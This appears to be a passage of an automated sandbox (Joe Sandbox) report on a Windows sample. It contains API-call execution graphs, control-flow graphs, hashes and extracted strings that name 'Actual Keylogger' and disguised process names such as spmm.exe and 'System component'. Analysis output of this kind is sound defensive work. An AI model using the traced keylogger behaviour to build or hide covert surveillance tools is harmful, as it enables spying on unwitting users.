                                                                                                                                                                                                                                                            execution_graph 28079 33d39fd 28082 33d3980 WSAStartup 28079->28082 28081 33d3a0a 28082->28081 28083 33dd15c 28086 33dd078 28083->28086 28085 33dd183 28087 33dd08d 28086->28087 28090 33dd095 28086->28090 28092 33cce40 VirtualFree 28087->28092 28091 33dd109 28090->28091 28093 33dcffc VirtualAlloc 28090->28093 28091->28085 28092->28090 28093->28090 28094 33a2598 28095 33a259c 28094->28095 28098 33a25a6 28094->28098 28100 33a1fd8 28095->28100 28096 33a25a2 28096->28098 28111 33a5e54 LocalAlloc TlsGetValue 28096->28111 28101 33a1ff1 28100->28101 28102 33a1fec 28100->28102 28104 33a2016 RtlEnterCriticalSection 28101->28104 28105 33a2020 28101->28105 28108 33a1ff5 28101->28108 28112 33a1904 28102->28112 28104->28105 28105->28108 28118 33a1ee4 28105->28118 28108->28096 28109 33a214b 28109->28096 28110 33a2141 RtlLeaveCriticalSection 28110->28109 28111->28098 28113 33a191f 28112->28113 28114 33a1950 LocalAlloc 28113->28114 28115 33a196a 28114->28115 28116 33a19b9 28115->28116 28117 33a19af RtlLeaveCriticalSection 28115->28117 28116->28101 28117->28116 28119 33a1ef4 28118->28119 28120 33a1f20 28119->28120 28123 33a1f44 28119->28123 28124 33a1e58 28119->28124 28120->28123 28129 33a1cf8 28120->28129 28123->28109 28123->28110 28133 33a16c4 28124->28133 28127 33a1e75 28127->28119 28130 33a1d16 28129->28130 28131 33a1d4d 28129->28131 28130->28123 28131->28130 28159 33a1c60 28131->28159 28137 33a16e0 28133->28137 28134 33a16ea 28152 33a15b0 VirtualAlloc 28134->28152 28137->28134 28138 33a1747 28137->28138 28140 33a173b 28137->28140 28144 33a141c 28137->28144 28153 33a1318 LocalAlloc 28137->28153 28138->28127 28143 33a1dcc 7 API calls 28138->28143 28154 33a14f8 28140->28154 28141 33a16f6 28141->28138 28143->28127 28145 33a142b VirtualAlloc 28144->28145 28147 33a147b 28145->28147 28148 33a1458 28145->28148 28147->28137 28158 33a12d0 LocalAlloc 28148->28158 28150 33a1464 28150->28147 28151 33a1468 VirtualFree 28150->28151 28151->28147 28152->28141 28153->28137 28157 33a1527 28154->28157 28155 33a1580 28155->28138 28156 33a1554 VirtualFree 28156->28157 28157->28155 28157->28156 28158->28150 28160 33a1c72 28159->28160 28161 33a1ca7 28160->28161 28162 33a1c95 28160->28162 28164 33a1878 3 API calls 28161->28164 28172 33a1878 28162->28172 28165 33a1ca5 28164->28165 28171 33a1cbd 28165->28171 28182 33a1b3c 7 API calls 28165->28182 28167 33a1ccc 28168 33a1ce6 28167->28168 28183 33a1b90 7 API calls 28167->28183 28184 33a138c LocalAlloc 28168->28184 28171->28130 28173 33a189e 28172->28173 28181 33a18f7 28172->28181 28185 33a1644 28173->28185 28177 33a18bb 28178 33a14f8 VirtualFree 28177->28178 28179 33a18d2 28177->28179 28178->28179 28179->28181 28190 33a138c LocalAlloc 28179->28190 28181->28165 28182->28167 28183->28168 28184->28171 28187 33a167b 28185->28187 28186 33a16bb 28189 33a1318 LocalAlloc 28186->28189 28187->28186 28188 33a1695 VirtualFree 28187->28188 28188->28187 28189->28177 28190->28181 28191 402e0c 28192 402e24 28191->28192 28193 40306c 28191->28193 28194 402e36 28192->28194 28201 402ec1 Sleep 28192->28201 28195 403030 28193->28195 28199 402bb8 28193->28199 28196 402e45 28194->28196 28203 402f24 28194->28203 28206 402f05 Sleep 28194->28206 28197 40308a 28195->28197 28198 40304a Sleep 28195->28198 28202 402af8 VirtualAlloc 28197->28202 28208 4030a8 28197->28208 28198->28197 28200 403060 Sleep 28198->28200 28209 402bf3 28199->28209 28212 402b70 28199->28212 28200->28195 28201->28194 28204 402ed7 Sleep 28201->28204 28202->28208 28211 402f30 28203->28211 28216 402af8 28203->28216 28204->28192 28206->28203 28207 402f1b Sleep 28206->28207 28207->28194 28213 402bb6 28212->28213 28214 402b79 28212->28214 28213->28209 28214->28213 28215 402b9d Sleep 28214->28215 28215->28214 28220 402a8c 28216->28220 28218 402b00 VirtualAlloc 28219 402b17 28218->28219 28219->28211 28221 402a2c 28220->28221 28221->28218 28222 33dccb0 28224 33dccf1 28222->28224 28223 33dcea4 28224->28223 28227 33dc1a8 28224->28227 28231 33dc328 VirtualAlloc 28224->28231 28228 33dc1ca 28227->28228 28230 33dc290 28228->28230 28232 33d9d6c 28228->28232 28230->28224 28231->28224 28235 33cce20 VirtualAlloc 28232->28235 28234 33d9d8b 28234->28230 28235->28234 28236 33fe10f 28239 33fe317 28236->28239 28237 33fe336 VirtualAlloc 28237->28239 28238 33fe3b4 VirtualFree 28238->28237 28240 33fe3f1 28238->28240 28239->28237 28239->28238 28239->28240 28241 403190 28242 4031a5 28241->28242 28243 403288 28241->28243 28244 4031ab 28242->28244 28250 403222 Sleep 28242->28250 28243->28244 28245 402c1c 28243->28245 28246 4031b4 28244->28246 28247 40329d 28244->28247 28253 403266 Sleep 28244->28253 28248 403382 28245->28248 28249 402b70 Sleep 28245->28249 28258 40331c VirtualFree 28247->28258 28260 4032c0 28247->28260 28251 402c2d 28249->28251 28250->28244 28252 40323c Sleep 28250->28252 28254 402c43 VirtualFree 28251->28254 28259 402c5d 28251->28259 28252->28242 28253->28247 28255 40327c Sleep 28253->28255 28256 402c54 28254->28256 28255->28244 28257 402c66 VirtualQuery VirtualFree 28257->28256 28257->28259 28259->28256 28259->28257 28261 33e1a0c 28262 33e1a44 28261->28262 28275 33d68c0 28262->28275 28265 33e1a50 28279 33d5d44 28265->28279 28266 33e1b2a 28268 33e1b54 28266->28268 28285 33dd378 VirtualAlloc 28266->28285 28286 33d6c38 VirtualAlloc VirtualFree 28268->28286 28270 33e1b9c 28272 33e1bf9 28270->28272 28287 33c7c64 VirtualAlloc 28270->28287 28274 33e1c44 28272->28274 28288 33cce20 VirtualAlloc 28272->28288 28276 33d68cd 28275->28276 28277 33d693d GetProcessAffinityMask 28276->28277 28278 33d6924 28276->28278 28277->28278 28278->28265 28280 33d5d7f 28279->28280 28289 33d5728 28280->28289 28283 33d5728 VirtualAlloc 28284 33d5eee 28283->28284 28284->28266 28285->28268 28286->28270 28287->28272 28288->28274 28292 33d5ffc 28289->28292 28293 33d601d 28292->28293 28296 33cce20 VirtualAlloc 28293->28296 28295 33d5735 28295->28283 28296->28295 28297 33e1dcc 28303 33e1df9 28297->28303 28298 33e1f7f 28313 33dd1f8 VirtualFree 28298->28313 28300 33e1fac 28314 33c7ae0 VirtualFree 28300->28314 28302 33e1fb1 28303->28298 28309 33c3f10 28303->28309 28306 33e1ecc 28307 33c3f10 GetTempPathA 28306->28307 28308 33e1f42 28306->28308 28307->28308 28312 33c31d8 VirtualAlloc VirtualFree 28308->28312 28315 33c3ee8 28309->28315 28312->28298 28313->28300 28314->28302 28318 33c3c3c 28315->28318 28317 33c3ef5 28317->28306 28319 33c3c5a 28318->28319 28320 33c3c52 28318->28320 28324 33c4bb0 28319->28324 28323 33c3c54 28320->28323 28327 33c48cc GetTempPathA 28320->28327 28323->28317 28328 33c2658 28324->28328 28326 33c4bd8 28326->28323 28327->28323 28329 33c273b 28328->28329 28330 33c2699 28328->28330 28329->28326 28330->28329 28331 33c271a GetTempPathA 28330->28331 28331->28329 28332 33c1484 28333 33c1495 28332->28333 28334 33c149c 28333->28334 28336 33cce20 VirtualAlloc 28333->28336 28336->28333 28337 8675dc 28338 8675e4 28337->28338 28339 86765e SHGetPathFromIDListW 28338->28339 28340 867682 FindWindowW 28338->28340 28339->28340 28343 867898 28340->28343 28342 867bae 28343->28342 28344 867b95 ShellExecuteW 28343->28344 28344->28342 28345 8650dc 28346 8650f6 28345->28346 28347 865147 28345->28347 28349 40a8fc 28346->28349 28350 40a913 28349->28350 28351 40a927 GetModuleFileNameW 28350->28351 28352 40a93c 28350->28352 28353 40a956 28351->28353 28356 40a949 lstrcpynW 28352->28356 28354 40a964 RegOpenKeyExW 28353->28354 28355 40aacb 28353->28355 28357 40a9e5 28354->28357 28358 40a987 RegOpenKeyExW 28354->28358 28355->28347 28356->28353 28375 40a700 9 API calls 28357->28375 28358->28357 28359 40a9a5 RegOpenKeyExW 28358->28359 28359->28357 28361 40a9c3 RegOpenKeyExW 28359->28361 28361->28355 28361->28357 28362 40aa03 RegQueryValueExW 28363 40aa21 28362->28363 28364 40aa54 RegQueryValueExW 28362->28364 28376 404334 8 API calls 28363->28376 28366 40aa70 28364->28366 28367 40aa52 28364->28367 28381 404334 8 API calls 28366->28381 28368 40aaba RegCloseKey 28367->28368 28382 404350 8 API calls 28367->28382 28368->28347 28369 40aa29 RegQueryValueExW 28377 407dfc 28369->28377 28373 40aa78 RegQueryValueExW 28374 407dfc 8 API calls 28373->28374 28374->28367 28375->28362 28376->28369 28378 407d7c 28377->28378 28383 406c78 28378->28383 28381->28373 28382->28368 28384 406c99 28383->28384 28385 406c7e 28383->28385 28384->28367 28385->28384 28387 404350 8 API calls 28385->28387 28387->28384 28388 33d66c6 28390 33d66d6 28388->28390 28389 33d67d4 28390->28389 28391 33d6440 GetProcAddress 28390->28391 28391->28390 28392 33fe001 28393 33fe007 28392->28393 28394 33fe5ab 28393->28394 28395 33fe0a4 VirtualAlloc 28393->28395 28398 33fe651 28395->28398 28399 33fe0dd VirtualFree 28398->28399 28399->28394 28400 33aafa4 GetThreadLocale 28401 33aafd4 GetSystemMetrics GetSystemMetrics 28400->28401 28403 33ab012 GetCPInfo 28401->28403 28404 33ab01e 28401->28404 28403->28404 28405 33a5ee4 28406 33a5eef 28405->28406 28409 33a5f17 28405->28409 28411 33a5e98 GetModuleFileNameA 28406->28411 28414 33a3518 28409->28414 28426 33a4cb8 GetModuleFileNameA RegOpenKeyExA 28411->28426 28413 33a5ebb 28413->28409 28415 33a355f 28414->28415 28416 33a367c 28415->28416 28417 33a35b1 28415->28417 28423 33a36c2 28416->28423 28447 33a35f8 VirtualQuery 28416->28447 28443 33a34b8 28417->28443 28421 33a36b9 28422 33a36e1 MessageBoxA 28421->28422 28421->28423 28422->28423 28424 33a3732 FreeLibrary 28423->28424 28425 33a3756 ExitProcess 28423->28425 28424->28423 28427 33a4cfb RegOpenKeyExA 28426->28427 28428 33a4d19 28426->28428 28427->28428 28429 33a4d8b lstrcpy GetThreadLocale GetLocaleInfoA 28427->28429 28442 33a4b10 lstrcpy lstrcpyn lstrcpyn lstrlen lstrcpy 28428->28442 28432 33a4e6c 28429->28432 28433 33a4dbd 28429->28433 28431 33a4d45 RegQueryValueExA 28434 33a4d6d RegCloseKey 28431->28434 28435 33a4d53 RegQueryValueExA 28431->28435 28432->28413 28433->28432 28436 33a4dcd lstrlen 28433->28436 28434->28413 28434->28429 28435->28434 28437 33a4de5 28436->28437 28437->28432 28438 33a4e22 28437->28438 28439 33a4e06 lstrcpy LoadLibraryExA 28437->28439 28438->28432 28440 33a4e2c lstrcpy LoadLibraryExA 28438->28440 28439->28438 28440->28432 28441 33a4e4c lstrcpy LoadLibraryExA 28440->28441 28441->28432 28442->28431 28444 33a34f4 28443->28444 28445 33a34c7 28443->28445 28445->28444 28448 33ac310 28445->28448 28447->28421 28449 33ac32a 28448->28449 28457 33ac360 28448->28457 28458 33a35bc 28449->28458 28451 33ac356 28468 33aaa70 28451->28468 28452 33ac334 28452->28451 28462 33a3808 28452->28462 28457->28445 28459 33a35c3 28458->28459 28461 33a35d5 28459->28461 28480 33a5020 28459->28480 28461->28452 28463 33a380c 28462->28463 28464 33a381c 28462->28464 28463->28464 28485 33a3878 14 API calls 28463->28485 28465 33a384a 28464->28465 28486 33a25b0 LocalAlloc TlsGetValue 28464->28486 28465->28451 28469 33a5020 14 API calls 28468->28469 28470 33aaa92 28469->28470 28487 33aa3b4 14 API calls 28470->28487 28472 33aaaa1 28473 33a5020 14 API calls 28472->28473 28474 33aaab3 28473->28474 28488 33aa3b4 14 API calls 28474->28488 28476 33aaac2 28489 33a37d8 LocalAlloc TlsGetValue 28476->28489 28478 33aab30 28479 33ab05c 26 API calls 28478->28479 28479->28457 28481 33a5061 28480->28481 28482 33a5030 28480->28482 28481->28459 28482->28481 28484 33a389c 14 API calls 28482->28484 28484->28481 28485->28464 28486->28465 28487->28472 28488->28476 28489->28478 28490 7b16a4 28496 7b16d6 28490->28496 28491 7b17c9 28492 7b171e RtlEnterCriticalSection 28501 43eba0 49 API calls 28492->28501 28494 7b173c 28495 7b1746 28494->28495 28502 409078 8 API calls 28495->28502 28496->28491 28496->28492 28497 7b17b5 Sleep 28496->28497 28497->28496 28499 7b1753 RtlLeaveCriticalSection SendMessageW 28500 7b1774 28499->28500 28501->28494 28502->28499

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 151 33a4cb8-33a4cf9 GetModuleFileNameA RegOpenKeyExA 152 33a4cfb-33a4d17 RegOpenKeyExA 151->152 153 33a4d19-33a4d51 call 33a4b10 RegQueryValueExA 151->153 152->153 154 33a4d8b-33a4db7 lstrcpy GetThreadLocale GetLocaleInfoA 152->154 159 33a4d6d-33a4d83 RegCloseKey 153->159 160 33a4d53-33a4d68 RegQueryValueExA 153->160 157 33a4e6c-33a4e73 154->157 158 33a4dbd-33a4dc1 154->158 161 33a4dcd-33a4de3 lstrlen 158->161 162 33a4dc3-33a4dc7 158->162 159->154 160->159 163 33a4de6-33a4de9 161->163 162->157 162->161 164 33a4deb-33a4df3 163->164 165 33a4df5-33a4dfd 163->165 164->165 166 33a4de5 164->166 165->157 167 33a4dff-33a4e04 165->167 166->163 168 33a4e22-33a4e24 167->168 169 33a4e06-33a4e20 lstrcpy LoadLibraryExA 167->169 168->157 170 33a4e26-33a4e2a 168->170 169->168 170->157 171 33a4e2c-33a4e4a lstrcpy LoadLibraryExA 170->171 171->157 172 33a4e4c-33a4e6a lstrcpy LoadLibraryExA 171->172 172->157
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 033A4CD4
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 033A4CF2
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F003F,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 033A4D10
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000005,00000000,033A4D84,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?), ref: 033A4D4A
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,033A4EB0,00000000,00000000,00000000,00000005,?,00000000,00000000,00000000,00000000,00000005,00000000,033A4D84,?,80000001), ref: 033A4D68
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,033A4D8B,00000000,00000000,00000005,00000000,033A4D84,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 033A4D7E
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 033A4D96
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?), ref: 033A4DA3
                                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?), ref: 033A4DA9
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 033A4DD4
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 033A4E0B
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 033A4E1B
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 033A4E31
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 033A4E41
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 033A4E55
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 033A4E65
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcpy$LibraryLoad$LocaleOpenQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                                                            • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                            • API String ID: 466793542-3917250287
                                                                                                                                                                                                                                                            • Opcode ID: 95e43cd3aa2c74f8a8d70067a58eaf5e1c5ab3f5e838d206108d59a36fb8b0d8
                                                                                                                                                                                                                                                            • Instruction ID: da73fe36b0acebca5018847da06bb21761cf0eca421c3502214f77ff4bb6b229
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95e43cd3aa2c74f8a8d70067a58eaf5e1c5ab3f5e838d206108d59a36fb8b0d8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81416575E40B1C7AEB21D6E99CC6FEFB7ACDB04744F440091E604EA681D6B89A44CBA0

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 205 33a4d8a 206 33a4d8b-33a4db7 lstrcpy GetThreadLocale GetLocaleInfoA 205->206 207 33a4e6c-33a4e73 206->207 208 33a4dbd-33a4dc1 206->208 209 33a4dcd-33a4de3 lstrlen 208->209 210 33a4dc3-33a4dc7 208->210 211 33a4de6-33a4de9 209->211 210->207 210->209 212 33a4deb-33a4df3 211->212 213 33a4df5-33a4dfd 211->213 212->213 214 33a4de5 212->214 213->207 215 33a4dff-33a4e04 213->215 214->211 216 33a4e22-33a4e24 215->216 217 33a4e06-33a4e20 lstrcpy LoadLibraryExA 215->217 216->207 218 33a4e26-33a4e2a 216->218 217->216 218->207 219 33a4e2c-33a4e4a lstrcpy LoadLibraryExA 218->219 219->207 220 33a4e4c-33a4e6a lstrcpy LoadLibraryExA 219->220 220->207
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 033A4D96
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?), ref: 033A4DA3
                                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?), ref: 033A4DA9
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 033A4DD4
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 033A4E0B
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 033A4E1B
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 033A4E31
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 033A4E41
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 033A4E55
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 033A4E65
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcpy$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                                                                            • API String ID: 83785346-248832578
                                                                                                                                                                                                                                                            • Opcode ID: 1679add4925f18d3045a051d51c388a46b2d4d95985325ceb72851c3d43ca984
                                                                                                                                                                                                                                                            • Instruction ID: 735f51b55ac02bc5aa0343a113bb35f1699b3e8f6466a174199da28b9c249503
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1679add4925f18d3045a051d51c388a46b2d4d95985325ceb72851c3d43ca984
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99213E75E00B5C69EF35D6FC9CC5FEEB7ACDB05744F4800D1E608EA681D6B89A848B90
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,0040AF14,?,?,?,00000000,00000105,00000000,0040AF4B), ref: 0040AD6C
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,0040AF14,?,?,?,00000000,00000105,00000000,0040AF4B), ref: 0040AD75
                                                                                                                                                                                                                                                              • Part of subcall function 0040AC68: FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040AC82
                                                                                                                                                                                                                                                              • Part of subcall function 0040AC68: FindClose.KERNEL32(00000000,?,?,00000000), ref: 0040AC92
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3216391948-0
                                                                                                                                                                                                                                                            • Opcode ID: 316a988e03bb6a19fe7d88bc5a369a1a7340225a20f3a7857aa2c13cfe36e33b
                                                                                                                                                                                                                                                            • Instruction ID: 05cb4437e63bb6b3272f06b966d88aae6be7d9b60112c97dc79dcad86f01a405
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 316a988e03bb6a19fe7d88bc5a369a1a7340225a20f3a7857aa2c13cfe36e33b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF03A752413086FDB00DE9DD98CDA677DCBF18358F4040AAF948DF381C679E8409B69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040AC82
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,00000000), ref: 0040AC92
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                                            • Opcode ID: 9d19eb6e901d290de53762759ddddb56684746f91034ed087828929b31504424
                                                                                                                                                                                                                                                            • Instruction ID: 4447641847811743a9d484fd75f598e74346f1db9ae7184df3dfd51839572a63
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d19eb6e901d290de53762759ddddb56684746f91034ed087828929b31504424
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DD0C26251060927CA20D9BC8C89A9E738C5A00224B180766795CE32C0FA35D91005AD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 4ecf945b71f54a3124df47cedfe2b4815bd81d27520891cf9e0f0ea53d9edb37
                                                                                                                                                                                                                                                            • Instruction ID: ad02243de4ba9ca849368e7dca354b2f6734fe2b9d554fca1b212dc4ed219f53
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ecf945b71f54a3124df47cedfe2b4815bd81d27520891cf9e0f0ea53d9edb37
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24F01276D0570CAACB10EBFC8DC5ACEB3ACDF05224F540792A619E7191EB389B445B50

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 0 8675dc-8675df 1 8675e4-8675e9 0->1 1->1 2 8675eb-867628 1->2 5 86762a-867631 2->5 6 86763b-86765c 2->6 5->6 9 86765e-867678 SHGetPathFromIDListW 6->9 10 86769c-8676ce 6->10 11 867682-867692 9->11 15 8676d7-8676e9 10->15 16 8676d0 10->16 11->10 18 8676fc-86770e 15->18 19 8676eb-8676f2 15->19 16->15 21 867710-867717 18->21 22 867721-867733 18->22 19->18 21->22 24 867746-867758 22->24 25 867735-86773c 22->25 27 86775a-867761 24->27 28 86776b-86777d 24->28 25->24 27->28 30 867790-8677a2 28->30 31 86777f-867786 28->31 33 8677a4-8677ab 30->33 34 8677b5-8677c7 30->34 31->30 33->34 36 8677da-8677ec 34->36 37 8677c9-8677d0 34->37 39 8677ee-8677f5 36->39 40 8677ff-867814 36->40 37->36 39->40 42 867816-86781d 40->42 43 867827-867845 40->43 42->43 46 867847-86784e 43->46 47 867858-867860 43->47 46->47 48 867874-8678ba FindWindowW 47->48 49 867862-86786d 47->49 55 8678c3-8678c5 48->55 56 8678bc 48->56 49->48 57 8678c7-8678ce 55->57 58 8678f3-8678f5 55->58 56->55 57->58 64 8678d0-8678ea 57->64 59 867bd4-867bdb 58->59 60 8678fb-867a21 58->60 65 867be1-867bfb 59->65 66 867d3c-867d45 59->66 105 867a33-867a37 60->105 106 867a23-867a27 60->106 64->58 75 8678ec 64->75 69 867d4b-867d7a 65->69 76 867c01-867d3a 65->76 66->69 75->58 76->69 109 867a41-867a52 105->109 108 867a31 106->108 108->109 113 867af2-867bc8 ShellExecuteW 109->113 114 867a58-867a5f 109->114 150 867bcf 113->150 118 867a61-867a78 114->118 119 867a7a-867a91 114->119 118->113 127 867a93-867aaa 119->127 128 867aac-867ac0 119->128 127->113 131 867ac2-867ad9 128->131 132 867adb-867ae8 128->132 131->113 132->113 150->69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(0088735C,00887360,?,?,?,?,00000000,00000000), ref: 00867669
                                                                                                                                                                                                                                                            • FindWindowW.USER32(Tfmm,00000000,?,?,?,?,00000000,00000000), ref: 00867887
                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,00867FC8,00000000), ref: 00867B9D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000863000.00000040.00000001.01000000.00000015.sdmp, Offset: 00863000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_863000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExecuteFindFromListPathShellWindow
                                                                                                                                                                                                                                                            • String ID: Business$ Desktop$ Online$ Trial$.22$@7{$AKMBUS$Actual Keylogger$C:\ProgramData$RUNNING$SPS$SYSTEM$System component$TSystemComponentM$Tfmm$\spmm.exe$\temp\reg\info.uid$app:Run$app:Run:First$basic start$d2|$q842y95uit$spmm.exe$sps.exe$t-|$wlg.exe${78DFD215-B0D1-DA34-FE1A-278DDF34561C}
                                                                                                                                                                                                                                                            • API String ID: 3610533966-2168388552
                                                                                                                                                                                                                                                            • Opcode ID: e11afc3a4444000ae4868accce0f2068def0354540f18ba533456dfe47c48f64
                                                                                                                                                                                                                                                            • Instruction ID: 94ada79b6983850db52b76a130c23aa80cb03ac332c394dfa09cf6b95f2b9070
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e11afc3a4444000ae4868accce0f2068def0354540f18ba533456dfe47c48f64
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1126F30744205ABD710FBA6DD86F6A33A6FB44708F11447AF604AB3D6CA78EC458B99

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AAE1,?,00000000), ref: 0040A935
